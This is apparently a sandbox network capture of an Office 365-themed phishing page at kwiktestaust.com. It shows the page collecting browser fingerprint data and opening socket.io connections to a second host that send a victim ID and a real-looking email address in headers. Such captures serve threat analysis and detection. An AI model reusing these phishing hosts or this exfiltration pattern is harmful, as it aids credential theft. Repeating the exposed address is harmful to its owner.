                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:20 UTC820INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:20 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 1
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2cunSrHhvrv8UZxAKx2fqh8s6wBmA85C2M35yTHQLH%2Frb0%2BbN0Rs4sPJnU5XZhVqjOcNvl00PxIEzgxVkiPqh%2FrMdHVreFXXXj%2FaCq0OScdf1iQBdoIsA%2FD6VwYaLByu98G%2BXg3"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024b9cae36bd1-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1346&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1272&delivery_rate=2267815&cwnd=246&unsent_bytes=0&cid=9668367313e416f4&ts=949&x=0"
                                                                2024-11-07 20:41:20 UTC1INData Raw: 31
                                                                Data Ascii: 1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.1649781188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:20 UTC412OUTGET /socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:20 UTC764INHTTP/1.1 400 Bad Request
                                                                Date: Thu, 07 Nov 2024 20:41:20 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmxFDw1HiQhJFfOVoSWae6t6YWhf4W4RzVKYdYdZ7g4rfawASDHboiNVSrgX65DQNjeziG7QPOr4%2Bcf0NBe6fl5jYY%2FgcsG%2Fu0vfTFiOZqiJuZOtvHc5xVkrRtOTZZQFoG6lFtdx"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024be9ec27b16-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=990&delivery_rate=150449&cwnd=32&unsent_bytes=0&cid=bc9cf1a267914862&ts=247&x=0"
                                                                2024-11-07 20:41:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.1649782188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:21 UTC412OUTGET /socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:42:00 UTC930INHTTP/1.1 522
                                                                Date: Thu, 07 Nov 2024 20:42:00 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 15
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vykAgte5OM4G6u19ccgTxpcldUiZvNd00nQKoMx7vB7IPrq2kdgkGhv4TZNQ%2FBqqnTe18AhFG34Zwy7c4Mxc%2Fh7MBmoCaFcGrcdG%2FwXbiilc6OXKWL%2F354jpptno14v7MFw7lNpO"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8df024c3dd42e775-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=990&delivery_rate=151837&cwnd=32&unsent_bytes=0&cid=f580a24ea027061a&ts=38923&x=0"
                                                                2024-11-07 20:42:00 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                Data Ascii: error code: 522


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.1649785188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:21 UTC994OUTPOST /o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw== HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                Content-Length: 139351
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: https://kwiktestaust.com
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-User: ?1
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72
                                                                Data Ascii: %5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74
                                                                Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAElement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnat
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c
                                                                Data Ascii: ative+code%5D+%7D%22%2C%22HTMLMenuElement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeEl
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79
                                                                Data Ascii: D%22%2C%22AbortSignal%22%3A%22function+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 65 72 50 61 63 6b 65 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f
                                                                Data Ascii: erPacket%22%3A%22function+USBIsochronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22functio
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 53 6f 75 72 63 65 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25
                                                                Data Ascii: %2C%22MediaStreamAudioSourceNode%22%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%
                                                                2024-11-07 20:41:21 UTC16384OUTData Raw: 65 65 63 68 53 79 6e 74 68 65 73 69 73 25 32 32 25 32 43 25 32 32 6f 6e 63 6f 6e 74 65 6e 74 76 69 73 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63
                                                                Data Ascii: eechSynthesis%22%2C%22oncontentvisibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetc
                                                                2024-11-07 20:41:21 UTC8279OUTData Raw: 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 4e 53 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 4e 53 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76
                                                                Data Ascii: createAttribute%22%3A%22function+createAttribute%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createAttributeNS%22%3A%22function+createAttributeNS%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createCDATASection%22%3A%22function+createCDATASection%28%29+%7B+%5Bnativ
                                                                2024-11-07 20:41:23 UTC839INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Powered-By: PHP/7.3.33
                                                                Cache-Control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rV6tGnJ5v7gt4Oys%2FrtIZmWUoX218M20oV0kSENHfS9hPgzY8U6MBlFtPnALXz%2FtTidzhswKNnKWgjPmMFD9hzeNayKBYvYFdeh1HVzBILcU6ev67qsJGoqnDW8f0YWogafj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024c76ed52e2d-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1335&sent=61&recv=157&lost=0&retrans=0&sent_bytes=2840&recv_bytes=141341&delivery_rate=1960731&cwnd=251&unsent_bytes=0&cid=984d1bd26d06d3cc&ts=2067&x=0"
                                                                2024-11-07 20:41:23 UTC371INData Raw: 31 36 63 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 53 58 68 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 56 58 6c 4e 56 45 46 35 54 56 52 46 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                                                Data Ascii: 16c<!DOCTYPE html><html id='html' sti='VlZORlVqSXhNVEF5TURJMFZUVXlNVEF5TVRFMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.1649788188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:22 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8N3B9 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:22 UTC916INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:22 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jz2Gztxr2IvUAqyQeozZPDa1hF7crLv7l69%2BWzdr4UIGTm0GZYzaLgLxdVQKA2NMOTC82ZjP%2FL5sP4Aag1tDG7XVo%2F7ppbLSIyNJIuANcU%2BM6nxhSpHuQzqrS1esK4ohC4A%2BhJ%2Bi"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024cbee016c6f-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1123&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1137&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=a0afc218481300b1&ts=173&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.1649790188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:27 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8N4dY HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:27 UTC915INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:27 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcwBqq9BdX4Vv3%2Bm1AnEWjHH9oIQgezTJ%2B08r%2BKK%2FriEkLyb2GuJ5idykoDJIGOXvqX8QszpzKzJU6VnItn8MSZkLDuT%2BOfw8PUPfq23QfxKhgz7Pc5FUygzI7tF95oFQNYtM7uh"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024e92add4605-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1254&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1137&delivery_rate=2039436&cwnd=250&unsent_bytes=0&cid=4a3a78836a130067&ts=3017&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.1649793188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:28 UTC669OUTGET /socket.io/?EIO=4&transport=polling&t=PC8N4dY HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:28 UTC818INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:28 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
